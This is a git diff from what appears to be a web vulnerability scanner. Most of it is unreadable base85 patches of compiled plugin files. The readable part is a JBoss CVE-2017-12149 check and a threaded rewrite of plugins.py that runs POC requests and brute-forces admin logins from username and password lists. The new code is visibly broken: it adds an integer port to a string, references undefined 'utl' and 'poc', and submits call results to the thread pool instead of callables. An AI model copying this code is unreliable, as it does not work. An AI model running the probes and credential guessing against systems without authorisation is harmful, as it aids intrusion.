zRnTNrQDoJivXW4}>Im6%wkU=ajbH{%&08!1{=p$ty81<_#hH1!iJPSu4>PltMgyHR zxsk=6=UM0KXZ`(8*Y!N>m@xS+i;`2R6i`ZE)yP0kFQz;-NjEbu4OvYUhrX(DnqF3M fL8%B>A%ughWHKjf5o>7;$OdlK0#qBSSq}pM5)xd& delta 177 zcmcc4w~vR{iISxKl~WrS=xTNFczN-%?_>MfQ4|KN}+UHzie;>6;!#lNuAoUySr5r0jLe>3y6(eM$RFO!eGpB6&jkYaJ+Ybkh+T@)zJZ zAa#&uAnZ4&KAISnF-06t4Q^Jb!so!Mvp zROZybKp5?zlTQ}n^<$rY#b{z-^e*5*Wt~IKdvY28dvEQd*ATZ4vWG^iDoZf2D|_0I zIZl4aNa!u@v=)RDmSr-Gg~yL*62`!{a9$~sO5Ug(MQTe0LyD;6kk+JfK?$4jkaFQY zA4N&Y(_$!W*)uMzK>^d^2s5ORFe-*`)4r(9?qI^183HE)^UsJjA=j^$?MJROE0g|?vd)aB1iS>idvUUxjT6gpJvHpIW}w+l#5*;_4@M% Dxx;1` literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc b/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..ea12fb7bd20b429d98acfba0d2adb6d4d3131c44 GIT binary patch literal 2210 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 O0{LlxXyLIhx&AK=s;bTa literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/tomcat_plugin.cpython-37.pyc b/plugins/__pycache__/tomcat_plugin.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..283c1f4648881ce7c87f6e53d3160d3852443030 GIT binary patch literal 287 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 literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/user_agent.cpython-37.pyc b/plugins/__pycache__/user_agent.cpython-37.pyc index 72c6ef54a99da72b75ff219ac1edcfa747fb2fbf..da4cac22509e5ff528f1075615a68279ead5ee72 100644 GIT binary patch delta 265 zcmZoZ$oT6ZBd-%LFBbz4e9)N}^K&AvKjXcPvF8~@Q=XM_ zH^;ir)o+ zk*;HUYF>#Z(=E25#JrUJ+*@qP8Tpx$&ErHE**5#c{bRJ`0D3}`sfYzg6@l1AY^Ve~ Xkb8^6CO1E&G$+-L3CJr35gd#F`two* delta 116 zcmex$kg@q7Bd-%LFBbz4+)$q#(>#&apYhtp*z=4$B@7D~YZw+X1~X_r-R!{hK6>)J xI2A^g&4=UuF)ABjn<}09L z&7)#QJ3BMg?sm0WD8c*ub@w6rG=)Db#oWr!l?W>HOB6qG%2>QKrg%^|yH{<=s%`i@ z>8Gq|q%OqK2G3mzHa1}#OZz`?jtZ(_ej4m7NX?N6n7mV$@pJEfAxxO9(W~Xn;>6HtSS@EA= DHuOqM literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..49f48570c6e873d6f9a60286826b54a76157fb7e GIT binary patch literal 1607 zcmaJ>&rj4q6rSm?ZM(a;Aw-E9<8=?fvdgY3F~*1_9*~1Xg@&XlZCMK4wwcZbmO!GB z#486c8WP!?CjJHf4W2xiUX4cn1y8=|N@>B;$-MdYecw#qzIm??%Vib8bNK4RswE-x zgZ(&tH~>5EP_MB=m7ZledKi-R zMU$n9JpxP_<{ZrM8-}#ueU74IyoWZqW8UHh7%V@)1H8}oD^xfZ_xL?-0Ev8oyqf}| z(w0gdW5fn6Si);a_X_g3Wz-*~@=$Gw14wpCzmw>tj9$sne@yg+j9$&re^2ysN?)PH zO!T*g(H~+0*U1LNucY*&v~=$LvmLX^4mGo*oV&wKb`(=PDs&_#rlUk(%IL4;=)WfV z@|oU3P>3Uo&dLphb_*Mn2D4LByD|eIpx$+M_37%o{rlkkucOaD-+VcF`;I_8ptNRK zuo+F3X62hp4~zLS8cI8t9@h0`H1xqmI@1JM`YQW(r!A48s+C9zeRIpEQMqH&4L_u7 zeb4CH5#J+jB!-kY0bxB9@ucTP%KVOL2h{PsNDPSMQNja9SaT7P8Te8m!upI9m{FKv z-?6F?@doKclIeTvPA3uqpU{YNf=`IB@ct}6nq3Y0=7vGK69MrzZIiApPCRie%eA)+ zVlSD7chM2Jy^iCBtK0UP>vtSe4+GnD3|Ai#`ee|L#`DM$yf<6`gRp?dISyCw2n-I7 z=B$-i!FZ-TTTlILCF5{jwWN*x3vDuad*GXKCjXnVI9qYvl9Z7moD?4yXDDT^0TIdf Uy1vzO?fdL@!Z9! {}:{}'.format(ip, port)) + else: + print("不存在 CVE_2017_12149 反序列化漏洞") + except Exception: + print("CVE_2017_12149 检测函数出错") +def jboss_special_plugin_(arg,config): + CVE_2017_12149(arg,config) + diff --git a/plugins/plugins.py b/plugins/plugins.py index b8c14c5..ef0940f 100644 --- a/plugins/plugins.py +++ b/plugins/plugins.py @@ -4,73 +4,127 @@ import requests import os import json import traceback +from concurrent.futures import ThreadPoolExecutor +from plugins.special_plugin_ import special_plugin_ sys.path.append("plugins") import plugins current_file=os.path.dirname(os.path.abspath(__file__)) from user_agent import get_user_agent class plugins(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,config): + self.arg=arg + self.config=config + self.url=arg.url + self.options=arg.options + self.ThreadNum=config.ThreadNum + self.Timeout=config.Timeout + self.vuln=[] + self.port=config.port def run(self): + print("\n第一部分standard_poc 测试开始:") + print("***********************") files=os.listdir(current_file) - for file in files: - if "_plugin.py" in file: - module=file.rstrip(".py") - pocs=__import__(module).pocs - self.check(pocs) + list_8080=["axis","glassfish","jboss","resin","spring","tomcat","struts2"] + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for file in files: + if "_plugin.py" in file: + module = file.rstrip(".py") + pocs = __import__(module).pocs + module=module.strip("_plugin") + if module in list_8080: + self.port=8080 + if module in ["weblogic"]: + self.port=7001 + excetor.submit(self.check(pocs)) + if self.vuln: + print("\n\n\n第一部分 standard_poc 测试出的漏洞有:") + for vuln in self.vuln: + print(vuln) + else: + print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。") + print("\n\n\n第二部分:\n开始测试特定的poc脚本:") + print("***********************") + special_plugin_(self.arg,self.config) + def request_get(self,url,params,data,flags,success_num,success,fail,pocs): + try: + headers = get_user_agent() + s = requests.get(url=url+":"+self.port, params=params, headers=headers,timeout=self.Timeout) + if not flags: + if s.status_code!=404: + self.vuln.append(self.url+success) + for flag in flags: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + self.vuln.append(success + " \npocs: \n" + pocs) + print(success + " \npocs: \n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_get(url, params, data, flags, success_num,success,fail,pocs) + def request_post(self,url,params,data,flag,success_num,username,password,success,fail,pocs): + try: + headers = {'User-Agent': get_user_agent()} + s = requests.post(url=url+":"+self.port, data=data, headers=headers,timeout=self.Timeout) + for flag in poc["flag"]: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + if pocs["admin_bursk"]==True: + self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + else: + self.vuln.append(success + " \n pocs: \n" + pocs) + print(success + " \n pocs: \n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_post(url,params,data,flag,success_num,username,password,success,fail,pocs) def check(self,pocs): - for poc in pocs: - for url in poc["url"]: - try: - success_num = 0 - url = self.url + url - if poc["requests_option"] == "GET": - if not poc["params"]: - poc["params"].append("seize") - for params in poc["params"]: - success_num=0 - try: - headers = {'User-Agent': get_user_agent()} - s = requests.get(url=url, params=params, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print(poc["success"]+" , url: "+url) - except Exception: - print(traceback.print_exc()) - if poc["requests_option"] == "POST": - if not poc["data"]: - poc["data"].append("seize") - for data in poc["data"]: - try: - if poc["admin_bursk"] == "True": - for username in poc["username"]: - for password in poc["password"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print("success url:"+utl+" "+poc["success"] + ",username:%s password:%s" % (username, password)) - except Exception: - print(traceback.print_exc()) - else: + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for poc in pocs: + for url in poc["url"]: + try: + url = self.url + url + if poc["requests_option"] == "GET": + if not poc["params"]: + poc["params"].append("seize") + for params in poc["params"]: + success_num = 0 try: - for data in poc["data"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print("success url:" + utl + " " + poc["success"]) + excetor.submit(self.request_get(url, params, poc["data"], poc["flag"], success_num, poc["success"],poc["fail"],poc)) except Exception: print(traceback.print_exc()) - except Exception: - print(traceback.print_exc()) - print(poc["end"]) + if poc["requests_option"] == "POST": + if not poc["data"]: + poc["data"].append("seize") + for data in poc["data"]: + try: + if poc["admin_bursk"] == "True": + for username in poc["username"]: + for password in poc["password"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"],success_num, username, password, poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + else: + success_num = 0 + try: + for data in poc["data"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"], success_num,poc["username"], poc["password"], poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + if poc["end"]: + if "/" in poc["end"]: + print(self.url+poc["end"]) + else: + print(self.url+" "+poc["end"]) diff --git 